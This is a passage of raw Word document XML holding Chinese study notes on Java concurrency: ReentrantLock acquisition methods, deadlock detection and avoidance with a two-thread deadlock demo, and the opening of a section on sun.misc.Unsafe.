          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> ReentrantLock</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD7453">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>获取锁定与三种方式：</w:t>
      </w:r>
      <w:r w:rsidR="00BD7453">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BD7453">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    a)</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD7453">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> lock(), </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD7453">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>如果获取了锁立即返回，如果别的</w:t>
      </w:r>
      <w:hyperlink r:id="rId154" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00BD7453">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="2D64B3"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>线程</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00BD7453">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>持有锁，当前线程则一直处于</w:t>
      </w:r>
      <w:hyperlink r:id="rId155" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00BD7453">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="2D64B3"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>休眠状态</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00BD7453">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，直到获取锁</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD7453">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    b) tryLock(), </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD7453">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>如果获取了锁立即返回</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD7453">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD7453">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，如果别的线程正持有锁，立即返回</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD7453">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>false</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD7453">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD7453">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    c) tryLock (long timeout, TimeUnit  unit)</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD7453">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD7453">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD7453">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>如果获取了锁定立即返回</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD7453">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD7453">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，如果别的线程正持有锁，会等待参数给定的时间，在等待的过程中，如果获取了锁定，就返回</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD7453">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD7453">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，如果等待超时，返回</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD7453">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>false</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD7453">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD7453">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    d) lockInterruptibly:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD7453">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>如果获取了锁定立即返回，如果没有获取锁定，当前线程处于</w:t>
      </w:r>
      <w:hyperlink r:id="rId156" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00BD7453">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="2D64B3"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>休眠状态</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00BD7453">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，直到或者锁定，或者当前线程被别的线程中断</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E52E4" w:rsidRDefault="008E52E4" w:rsidP="008E52E4">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>1.3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3.6</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>死锁检测</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E52E4" w:rsidRDefault="008E52E4" w:rsidP="008E52E4">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>jmap dump</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>线程查看线程出什么问题了，为什么不能提供服务。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E52E4" w:rsidRDefault="008E52E4" w:rsidP="008E52E4">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>避免死锁的方案：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E52E4" w:rsidRDefault="008E52E4" w:rsidP="008E52E4">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(1)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>避免一个线程同时获取多个锁</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E52E4" w:rsidRPr="005D4091" w:rsidRDefault="008E52E4" w:rsidP="008E52E4">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(2)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>避免一个线程在锁内同时占用多个资源，尽量保证每个锁只占用一个资源。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E52E4" w:rsidRDefault="008E52E4" w:rsidP="008E52E4">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(3)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>尝试使用定时锁，使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>lock.tryLock(timetou)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来代替使用内部锁机制</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E52E4" w:rsidRPr="005D4091" w:rsidRDefault="008E52E4" w:rsidP="008E52E4">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(4)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对于数据库锁，加锁和解锁必须在一个数据库连接例，否则会出现解锁失败的情况。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E52E4" w:rsidRPr="005D4091" w:rsidRDefault="008E52E4" w:rsidP="008E52E4"/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="ab"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="360" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8162"/>
      </w:tblGrid>
      <w:tr w:rsidR="008E52E4" w:rsidTr="008747CD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
          </w:tcPr>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package com.study.dubbo.concurrent;</w:t>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import java.util.Vector;</w:t>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import java.util.concurrent.atomic.AtomicInteger;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008E52E4" w:rsidRPr="00511F14" w:rsidRDefault="008E52E4" w:rsidP="008747CD">
            <w:pPr>
              <w:pStyle w:val="a3"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="666666"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pP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public class Deadlock {</w:t>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ab/>
              <w:t>private static String A = "A";</w:t>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ab/>
              <w:t>private static String B = "B";</w:t>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ab/>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ab/>
              <w:t>public static void main(String[] args) {</w:t>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hint="eastAsia"/>
                <w:color w:val="666666"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00511F14">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
                <w:color w:val="666666"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:tab/>
              <w:t>//</w:t>
            </w:r>
            <w:r w:rsidRPr="00511F14">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
                <w:color w:val="666666"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>内存溢出加死锁</w:t>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t>Vector v = new Vector();</w:t>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t>for (int i = 0; i &lt; 1000000; i++) {</w:t>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t>Object o = new Object();</w:t>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t>v.add(o);</w:t>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t>o = null;</w:t>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t>}</w:t>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t>AtomicInteger a = new AtomicInteger();</w:t>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t>Thread t1 = new Thread(new Runnable() {</w:t>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t>public void run() {</w:t>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t>synchronized (A) {</w:t>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t>try {</w:t>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t>Thread.sleep(2000);</w:t>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t>} catch (InterruptedException e) {</w:t>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lastRenderedPageBreak/>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t>e.printStackTrace();</w:t>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t>}</w:t>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t>synchronized (B) {</w:t>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t>System.out.println("BBBBBBBBBBBBB");</w:t>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t>}</w:t>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t>}</w:t>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t>}</w:t>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t>});</w:t>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t>Thread t2 = new Thread(new Runnable() {</w:t>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t>public void run() {</w:t>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t>synchronized (B) {</w:t>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t>synchronized (A) {</w:t>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t>System.out.println("AAAAAAAAA");</w:t>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t>}</w:t>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t>}</w:t>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t>}</w:t>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t>});</w:t>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t>t1.start();</w:t>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t>t2.start();</w:t>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ab/>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008E52E4" w:rsidRPr="00511F14" w:rsidRDefault="008E52E4" w:rsidP="008747CD">
            <w:pPr>
              <w:pStyle w:val="a3"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="666666"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="008E52E4" w:rsidRDefault="008E52E4" w:rsidP="008747CD">
            <w:pPr>
              <w:pStyle w:val="a3"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="666666"/>
                <w:kern w:val="0"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00511F14">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="666666"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="008E52E4" w:rsidRPr="00F81963" w:rsidRDefault="008E52E4" w:rsidP="008E52E4">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008E52E4" w:rsidRPr="00BD7453" w:rsidRDefault="008E52E4" w:rsidP="00C12E3F">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F3FFEC"/>
        <w:spacing w:after="150" w:line="360" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C226FA" w:rsidRPr="00C226FA" w:rsidRDefault="00C226FA" w:rsidP="00C226FA">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8306"/>
        </w:tabs>
        <w:ind w:left="360" w:firstLineChars="50" w:firstLine="105"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A95D64" w:rsidRDefault="00F56527" w:rsidP="00A95D64">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>1.3.</w:t>
      </w:r>
      <w:r w:rsidR="006D638D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00A95D64" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="00BD1DCE" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Unsafe</w:t>
      </w:r>
      <w:r w:rsidR="005F479F" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>相关</w:t>
      </w:r>
      <w:r w:rsidR="00BD1DCE" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>类</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F4466E" w:rsidRPr="00343A19" w:rsidRDefault="006D638D" w:rsidP="00343A19">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1.3.4</w:t>
      </w:r>
      <w:r w:rsidR="00927641">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.1 Unsafe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF53A2" w:rsidRDefault="00CF53A2" w:rsidP="00CF53A2">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
        <w:spacing w:before="150" w:beforeAutospacing="0" w:after="150" w:afterAutospacing="0" w:line="360" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>在开始分析</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>java.util.concurrent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>的源代码直接，首先要了解的就是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>sun.misc.Unsafe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>类，这个类可以说的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>并发包的基础，基本上所有的组件都是依赖</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Unsafe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>来做底层的同步操作。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF53A2" w:rsidRDefault="00CF53A2" w:rsidP="00CF53A2">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
        <w:spacing w:before="150" w:beforeAutospacing="0" w:after="150" w:afterAutospacing="0" w:line="360" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CF53A2" w:rsidRDefault="00CF53A2" w:rsidP="00CF53A2">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
        <w:spacing w:before="150" w:beforeAutospacing="0" w:after="150" w:afterAutospacing="0" w:line="360" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Unsafe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>类有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>100+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>个方法，大部分是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>native</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>方法，可以理解为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>平台和底层操作系统直接的桥梁。它封装了大量的底层操作，比如直接操作内存的方法，低级同步的方法，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>CAS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>方法，直接操作</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Class</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>的方法，直接操作</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Object</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>的方法等</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>等。有了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Unsafe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
